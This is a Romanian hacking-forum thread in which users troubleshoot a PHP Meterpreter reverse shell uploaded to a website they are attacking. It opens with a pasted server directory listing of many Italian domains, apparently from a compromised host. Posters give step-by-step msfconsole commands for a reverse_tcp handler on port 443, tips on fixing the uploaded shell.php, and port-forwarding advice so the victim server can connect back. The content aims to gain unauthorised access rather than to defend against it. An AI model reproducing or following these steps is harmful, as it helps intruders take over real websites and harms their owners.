21 root root 4096 Jan 16 2012 tempodiesposizione.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 tennisvilladoro.netdrwxr-xr-x 14 root root 4096 Jan 24 2012 terremediterranee.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 thenewhouse.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 thotconsulting.itdrwxr-xr-x 12 root root 4096 Aug 24 14:19 thurm.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 tooseido.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 torrisimmobiliare.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 tre-x.netdrwxr-xr-x 14 root root 4096 Jan 31 2012 trebbiricambi.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 trunksz.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 tsgsrl.netdrwxr-xr-x 14 root root 4096 Jan 17 2012 tullioberlenghi.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 universalsport.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 unsorriso.eudrwxr-xr-x 14 root root 4096 Jan 24 2012 urbinatiluca.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 usarcibari.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 vacuumsealer.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 vacuumsealerflower.comdrwxr-xr-x 14 root root 4096 Jan 18 2012 valliceramiche.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 vanitasbeauty.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 victoriagray.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 vilfer.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 villabrunaeventi.itdrwxr-xr-x 12 root root 4096 Aug 24 14:30 webdomini.com Quote
FaramirSV Posted October 27, 2012 Report Posted October 27, 2012 bun...am inteles tot dar tot nu m-am prins daca la comanda asta "msf exploit(handler) > set LHOST 0.0.0.0" tre setat ip-ul hostului sau lasam 0.0.0.0 ? Quote
neo.hapsis Posted October 27, 2012 Report Posted October 27, 2012 La setare LHOST (localhost) trebuie sa setezi 0.0.0.0 sau ip-ul tau ca sa se poate faca conexiunea intre tine si tinta. Quote
FaramirSV Posted October 27, 2012 Report Posted October 27, 2012 am setat dar nu se conecteaza....am asteptat 20 min si no zis nimic ...no trecut de etapa"[*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...[*" Quote
neo.hapsis Posted October 27, 2012 Report Posted October 27, 2012 Scuza dar shellul creat le-ai uplodat la websitul care le ataci?? le-ai si executat?Mai uitate in sursa la shell.php ca tagurile nu sunt puse automat! <?php si la sfarsit ?> Quote
FaramirSV Posted October 27, 2012 Report Posted October 27, 2012 da,l-am uploadat...l-am accesat dar da pagina alba! ///da am pus si tagurilesi tot nu trece de acel proces Quote
acuablue Posted October 27, 2012 Report Posted October 27, 2012 adica intrun cuvant din ce am inteles eu asa in mare iti faci shell din rdp server ? Quote
neo.hapsis Posted October 27, 2012 Report Posted October 27, 2012 da,l-am uploadat...l-am accesat dar da pagina alba! ///da am pus si tagurilesi tot nu trece de acel proces URMEAZA PAS cu PASmsfconsole -nuse exploit/multi/handlerset PAYLOAD php/meterpreter/reverse_tcpset LHOST 0.0.0.0set LPORT 443exploitAcum dute pe linkul care ti-am trimis in PM si spune-mi daca te ai conectat! Quote
FaramirSV Posted October 27, 2012 Report Posted October 27, 2012 (edited) am facut.... dar.... tot asteapta si de data asta [*] Started reverse handler on 0.0.0.0:443[*] Starting the payload handler...EDIT: am mai facut odata azi...dar in zadar...am facut totul cum scrii u si arata in video si nimic...tot ramane la "Started reverse handler on 0.0.0.0:443 ............"si nu am Wirelees Edited October 28, 2012 by FaramirSV Quote
neo.hapsis Posted October 29, 2012 Report Posted October 29, 2012 Nu stiu cum le creez shellul ,imi merge perfect si cu armitage!Daca nu le poti rezolva contacteaza ma pe ID-ul meu! 1 Quote
hades Posted October 29, 2012 Report Posted October 29, 2012 am facut.... dar.... tot asteapta si de data asta EDIT: am mai facut odata azi...dar in zadar...am facut totul cum scrii u si arata in video si nimic...tot ramane la "Started reverse handler on 0.0.0.0:443 ............"si nu am WireleesEvident. Ai router si pentru a putea folosi payload-ul respectiv trebuie sa iti faci port forwarding. Quote